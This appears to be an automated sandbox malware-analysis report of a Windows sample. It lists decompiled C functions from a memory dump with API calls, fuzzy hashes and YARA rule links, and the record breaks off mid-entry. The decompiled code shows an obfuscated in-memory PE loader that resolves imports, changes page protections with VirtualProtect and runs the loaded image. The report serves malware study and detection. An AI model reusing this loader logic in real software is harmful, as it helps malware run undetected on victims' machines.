Opcode Fuzzy Hash: 82bcdedacc0c3d4d310ba3edca22c50e924fae04d56a0a02bd4174ba4e5fcfb5
Instruction Fuzzy Hash: A1416C71D802199BDF14CF99C880AEEBBB6BF58314F14C129E9097B244D775AE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02EE20CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02EE20CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E02EE1C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x02ee20d7
0x02ee20dc
0x02ee20ea
0x02ee20ef
0x02ee20ef
0x02ee20f5
0x02ee20fa
0x02ee20fe
0x02ee2102
0x02ee2102
0x02ee210c
0x02ee2115

APIs

GetCurrentThread.KERNEL32 ref: 02EE20D1
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 02EE20DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 02EE20EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 02EE2102

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: a51d2d4ccee186fc24bd3a3cc9c35e9b1f94a5eefee041c80aaf326e08f8d653
Instruction ID: 2188fede7635e369bc76d3c443bd9df77a16704d260d8719259a7b2d49f90fc0
Opcode Fuzzy Hash: a51d2d4ccee186fc24bd3a3cc9c35e9b1f94a5eefee041c80aaf326e08f8d653
Instruction Fuzzy Hash: 94E02231BC16107BAE216A2A5C84EBBAB5CDF813347010325FA25D71D0CF908C5589B4

Uniqueness

Uniqueness Score: -1.00%

Function 02EE126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02EE126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x2ee41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x02ee1277
0x02ee1284
0x02ee128a
0x02ee1296
0x02ee12a6
0x02ee12a8
0x02ee12b0
0x02ee1345
0x02ee134c
0x00000000
0x00000000
0x00000000
0x02ee12b6
0x02ee12b6
0x02ee12b6
0x02ee12ba
0x00000000
0x00000000
0x02ee12c6
0x02ee12ca
0x02ee12ee
0x02ee12f2
0x02ee1306
0x02ee1306
0x02ee130c
0x02ee131b
0x02ee131f
0x02ee1327
0x02ee1327
0x02ee132f
0x02ee1332
0x02ee133f
0x00000000
0x00000000
0x00000000
0x00000000
0x02ee133f
0x02ee12fa
0x02ee12fe
0x02ee1304
0x00000000
0x00000000
0x00000000
0x02ee1304
0x02ee12d2
0x02ee12d6
0x02ee12e0
0x02ee12d8
0x02ee12d8
0x02ee12d8
0x00000000
0x02ee12d6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 02EE12A6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 02EE131B
GetLastError.KERNEL32 ref: 02EE1321

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: aeda1a804f7a8204c645d6c1fefe27ef09d103a709d2ed0f3114e9032ba90e7e
Instruction ID: e818cf5e668a2f6f065e864e1fd71e5f7d100f6c07f0de0921c9468199d017f7
Opcode Fuzzy Hash: aeda1a804f7a8204c645d6c1fefe27ef09d103a709d2ed0f3114e9032ba90e7e
Instruction Fuzzy Hash: 73218071C40606EFCF04CF95C881AAAF7F5FF08309F409959D01B9B584E3B8AA94CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02EE14E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E02EE14E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x2ee41c4);
				_push(1);
				_push( *0x2ee41d0 + 0x2ee5089);
				 *0x2ee41c0 = 0xc;
				 *0x2ee41c8 = 0; // executed
				L02EE1DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E02EE1697( &_v44,  &_v28,  *0x2ee41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x2ee41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E02EE1144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x2ee41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E02EE2118(_t40, _t30 + 4);
					}
				}
				_t23 = E02EE1444(_v44); // executed
				goto L7;
			}

0x02ee14fa
0x02ee14fb
0x02ee1500
0x02ee1508
0x02ee1509
0x02ee1513
0x02ee1519
0x02ee1522
0x02ee1527
0x02ee1545
0x02ee159a
0x02ee159b
0x02ee159c
0x02ee159c
0x02ee154d
0x02ee1553
0x02ee1561
0x02ee1565
0x02ee156c
0x02ee1574
0x02ee1578
0x02ee157a
0x02ee1589
0x02ee157c
0x02ee1582
0x02ee1582
0x02ee157a
0x02ee1591
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,02EE41C4,00000000), ref: 02EE1519
lstrlenW.KERNEL32(?,?,?), ref: 02EE154D

Part of subcall function 02EE1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,02EE156A,0000000A,?,?), ref: 02EE1151
Part of subcall function 02EE1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02EE1167
Part of subcall function 02EE1144: _snwprintf.NTDLL ref: 02EE118C
Part of subcall function 02EE1144: CreateFileMappingW.KERNELBASE(000000FF,02EE41C0,00000004,00000000,?,?), ref: 02EE11B1
Part of subcall function 02EE1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02EE156A,0000000A,?), ref: 02EE11C8
Part of subcall function 02EE1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02EE156A,0000000A), ref: 02EE11FD

ExitThread.KERNEL32 ref: 02EE159C

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 8ba3cbaec343bb8738c44da03ab67b83aa9341d1075776132f0ab2a53bf6e549
Instruction ID: 387cd570636b60fa999aca1f6b569b83552f0491ba1f6ab71ab6649014bb2617
Opcode Fuzzy Hash: 8ba3cbaec343bb8738c44da03ab67b83aa9341d1075776132f0ab2a53bf6e549
Instruction Fuzzy Hash: 8B1179729C4305EBDF10DB65D844E9B7BEDAB44704F418926B51AEF180D730E9988BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02F20860, Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02F681A8,00000000,00000001), ref: 02F208B6

Part of subcall function 02F23490: ___crtCorExitProcess.LIBCMTD ref: 02F23497
Part of subcall function 02F23490: ExitProcess.KERNEL32 ref: 02F234A3

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: ExitProcess$AllocateHeap___crt
String ID:
API String ID: 2561786895-0
Opcode ID: d3adc188b8bbb0bdcf1f86236be61fa10c36a393e74315656cf908349dc2ea7a
Instruction ID: b37f9ca9cf7b4fe01c689113027688881a85d0a5355a36955e1f9b05b5e1f2c3
Opcode Fuzzy Hash: d3adc188b8bbb0bdcf1f86236be61fa10c36a393e74315656cf908349dc2ea7a
Instruction Fuzzy Hash: F2116372D4021CEFEB14DFA4E848BAA7B75EB113C8F10452DFA054A280DB709AD8CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EE1F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x2ee41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x02ee1f7c
0x02ee1f85
0x02ee1f8a
0x02ee1f90
0x02ee1f99
0x02ee1f9f
0x02ee1fa1
0x02ee1fa4
0x02ee1fa9
0x02ee1fb0
0x02ee1fb0
0x02ee1fb4
0x02ee1fbc
0x02ee1fbf
0x00000000
0x00000000
0x02ee1fc5
0x02ee1fcf
0x02ee1fd1
0x02ee1fd4
0x02ee1fd7
0x02ee1fdb
0x02ee1fe3
0x02ee1fe5
0x02ee1fe8
0x02ee2050
0x02ee2050
0x02ee2054
0x00000000
0x00000000
0x02ee1fed
0x02ee1ff3
0x02ee1ff5
0x02ee2008
0x02ee200b
0x02ee200b
0x02ee200b
0x02ee200f
0x02ee1ff7
0x02ee1ff7
0x02ee1fff
0x02ee2001
0x00000000
0x00000000
0x00000000
0x00000000
0x02ee2001
0x02ee1fef
0x02ee1fef
0x02ee2003
0x02ee2003
0x02ee2003
0x02ee2012
0x02ee2015
0x02ee2017
0x02ee201e
0x02ee2019
0x02ee2019
0x02ee2019
0x02ee2026
0x02ee202c
0x02ee202e
0x02ee205e
0x02ee2030
0x02ee2030
0x02ee2033
0x02ee2035
0x02ee203d
0x02ee203d
0x02ee2042
0x02ee2044
0x02ee204b
0x02ee204d
0x02ee204d
0x02ee204d
0x00000000
0x02ee204d
0x00000000
0x02ee202e
0x02ee1fdd
0x02ee1fdf
0x02ee1fe1
0x00000000
0x00000000
0x02ee1fe1
0x02ee2061
0x02ee2061
0x02ee2068
0x02ee206d
0x00000000
0x00000000
0x02ee2073
0x02ee207e
0x00000000
0x02ee207e
0x02ee2075
0x02ee2075
0x02ee207b
0x00000000
0x02ee207b
0x02ee1fa9
0x02ee207f
0x02ee2084

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 02EE1FB4
GetProcAddress.KERNEL32(?,00000000), ref: 02EE2026

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: c808e26dce9d92d24e23467927f22c616bc3e388426c75c204fb9d5e0611ae96
Instruction ID: d9c02d468529a27c88f3c7fb37ba0822034cb4ed13ba893afc051c52a979ac58
Opcode Fuzzy Hash: c808e26dce9d92d24e23467927f22c616bc3e388426c75c204fb9d5e0611ae96
Instruction Fuzzy Hash: 34313B71A4020ADFDF14CF99C884AAEB7F9BF04308B149469DD06EB388E770DA40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02EE1ADB(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E02EE1697( &_v8,  &_v12,  *0x2ee41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E02EE2087(_t22, _v8,  *0x2ee41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E02EE1E8A(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x2ee4190, 0, _v8);
				}
				return _t25;
			}

0x02ee1adb
0x02ee1ade
0x02ee1adf
0x02ee1af5
0x02ee1afe
0x02ee1b03
0x02ee1b1c
0x02ee1b05
0x02ee1b18
0x02ee1b18
0x02ee1b20
0x02ee1b2a
0x02ee1b32
0x02ee1b3a
0x02ee1b3c
0x02ee1b3c
0x02ee1b3a
0x02ee1b4c
0x02ee1b4c
0x02ee1b57

APIs

StrStrIA.KERNELBASE(00000000,02EE1CE6,?,02EE1CE6,?,00000000,00000000,?,?,?,02EE1CE6), ref: 02EE1B32
HeapFree.KERNEL32(00000000,?,?,02EE1CE6,?,00000000,00000000,?,?,?,02EE1CE6), ref: 02EE1B4C

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3b3813a840a601ed58a5248dd4320b2193079b72310940954721c21cc269c37e
Instruction ID: 62b8f91132630fa26ab2999757509a513e76216dff99cb31237000a4d792d49b
Opcode Fuzzy Hash: 3b3813a840a601ed58a5248dd4320b2193079b72310940954721c21cc269c37e
Instruction Fuzzy Hash: D4018476E80114EBCF119BA6DC00EAF77ADDB44244F548161B906EB144E631DE808AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02F1FDE0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 02F1FDE5

Part of subcall function 02F1FD50: TlsGetValue.KERNEL32(02F53D3C,00000000), ref: 02F1FD63
Part of subcall function 02F1FD50: TlsGetValue.KERNEL32(02F53D3C,02F53D38), ref: 02F1FD84
Part of subcall function 02F1FD50: GetModuleHandleA.KERNEL32(02F4C518), ref: 02F1FD9A
Part of subcall function 02F1FD50: GetProcAddress.KERNEL32(00000000,02F4C508), ref: 02F1FDB2
Part of subcall function 02F1FD50: RtlEncodePointer.NTDLL(?), ref: 02F1FDD3

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: Value$AddressEncodeHandleModulePointerProc__encode_pointer
String ID:
API String ID: 1150849369-0
Opcode ID: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction ID: 74d32475b14907de1bc76cb6a58a54d8b54daa083aca6870d9472304dda68847
Opcode Fuzzy Hash: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction Fuzzy Hash: 3DA002A698830D23E54131D67C17B26765D4751AB9F890171EF0E09AA2F883B56448E7

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E02EE1444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x2ee41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2ee41cc - 0x63698bc4 &  !( *0x2ee41cc - 0x63698bc4);
				_t18 = E02EE1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2ee41cc - 0x63698bc4 &  !( *0x2ee41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2ee41cc - 0x63698bc4 &  !( *0x2ee41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E02EE1A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E02EE1F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E02EE126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E02EE142F(_t42);
					L8:
					return _t29;
				}
			}

0x02ee144c
0x02ee144e
0x02ee146a
0x02ee147b
0x02ee1482
0x02ee14e0
0x00000000
0x02ee1484
0x02ee1484
0x02ee148e
0x02ee1492
0x02ee1497
0x02ee149a
0x02ee149f
0x02ee14a3
0x02ee14a8
0x02ee14ad
0x02ee14b1
0x02ee14b6
0x02ee14b7
0x02ee14bb
0x02ee14c0
0x02ee14c8
0x02ee14c8
0x02ee14c0
0x02ee14b1
0x02ee14a3
0x02ee14ca
0x02ee14d3
0x02ee14d7
0x02ee14e1
0x02ee14e7
0x02ee14e7

APIs

Part of subcall function 02EE1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,02EE1480,?,?,?,?,00000002,00000000,?,?), ref: 02EE1084
Part of subcall function 02EE1060: GetProcAddress.KERNEL32(00000000,?), ref: 02EE10A6
Part of subcall function 02EE1060: GetProcAddress.KERNEL32(00000000,?), ref: 02EE10BC
Part of subcall function 02EE1060: GetProcAddress.KERNEL32(00000000,?), ref: 02EE10D2
Part of subcall function 02EE1060: GetProcAddress.KERNEL32(00000000,?), ref: 02EE10E8
Part of subcall function 02EE1060: GetProcAddress.KERNEL32(00000000,?), ref: 02EE10FE

Part of subcall function 02EE1A5A: memcpy.NTDLL(00000000,00000002,02EE148E,?,?,?,?,?,02EE148E,?,?,?,?,?,?,00000002), ref: 02EE1A87
Part of subcall function 02EE1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 02EE1ABA

Part of subcall function 02EE1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 02EE1FB4

Part of subcall function 02EE126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 02EE12A6
Part of subcall function 02EE126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 02EE131B
Part of subcall function 02EE126D: GetLastError.KERNEL32 ref: 02EE1321

GetLastError.KERNEL32(?,?), ref: 02EE14C2

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: feb7d1cf2b725c24a0dc44ee289c6f10a5020c05ee34f9cd7880fdb0a5d85ad5
Instruction ID: d0032a0e967b39966ce998194d58d8fdc64873d4518236f495b8f4d1cc488bb5
Opcode Fuzzy Hash: feb7d1cf2b725c24a0dc44ee289c6f10a5020c05ee34f9cd7880fdb0a5d85ad5
Instruction Fuzzy Hash: F3110B76640715ABDF20AAA98C80FAA77FDAF482047049554F90B9F641EBB0ED4687A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02F1B8F0, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02F251CB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F251E2
UnhandledExceptionFilter.KERNEL32(02F4CAC0), ref: 02F251ED
GetCurrentProcess.KERNEL32(C0000409), ref: 02F2520B
TerminateProcess.KERNEL32(00000000), ref: 02F25212

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6c1674cd453917019f447beb7bcb44e787061e3558cb3839c4891a8b78c37194
Instruction ID: d1e32397129f94612de849e582122359f7384327148e1450aeadc01f041d04e8
Opcode Fuzzy Hash: 6c1674cd453917019f447beb7bcb44e787061e3558cb3839c4891a8b78c37194
Instruction Fuzzy Hash: F921F0B5DC1718CBD340DF24F449644BBA0FB08BD4F84895EE92983301E7715AA88F59

Uniqueness

Uniqueness Score: -1.00%

Function 02F1EE50, Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

getSystemCP.LIBCMTD ref: 02F1EE65

Part of subcall function 02F1ED40: GetOEMCP.KERNEL32(00000000,02F531E0,02F33658,000000FF,?,02F1EB06,?), ref: 02F1ED99
Part of subcall function 02F1ED40: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 02F1EDAC

setSBCS.LIBCMTD ref: 02F1EE7A
setSBUpLow.LIBCMTD ref: 02F1EFD6

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: Locale$SystemUpdateUpdate::~_
String ID:
API String ID: 2101441384-0
Opcode ID: bee7c57b384f814817a0418a9cd9a04a5d89fee52c2d495abe8fb636e4b165d4
Instruction ID: 661afeba4f78b3c4acf1c739e041e7d8881bcb8ab5618e71e4dacdabddcb20a0
Opcode Fuzzy Hash: bee7c57b384f814817a0418a9cd9a04a5d89fee52c2d495abe8fb636e4b165d4
Instruction Fuzzy Hash: B4B14775A04219EFDB04CF94C880AAEBBB1BF44384F54C69AED266B341D331EA44CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F2CEB0, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 02F2CED2

Part of subcall function 02F31470: CreateFileA.KERNEL32(02F50900,40000000,00000003,00000000,00000003,00000000,00000000,?,02F2CED7,?,?,?,02F27436,?), ref: 02F31487

GetConsoleOutputCP.KERNEL32(00000000,02F27436,00000001,?,00000005,00000000,00000000,?,?,?,02F27436,?), ref: 02F2CF55
WideCharToMultiByte.KERNEL32(00000000,?,?,?,02F27436,?), ref: 02F2CF5C
WriteConsoleA.KERNEL32(02F541C8,?,02F27436,?,00000000,?,?,?,02F27436,?), ref: 02F2CF83

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: b713c03b740467d702f33e9fd3c385514643de9425dc7328df7258eaa6e0d8fe
Instruction ID: 8ca1236a170bf35c1b0391752b70b655919fb420d5f3a894dbe91d41d42b4c1b
Opcode Fuzzy Hash: b713c03b740467d702f33e9fd3c385514643de9425dc7328df7258eaa6e0d8fe
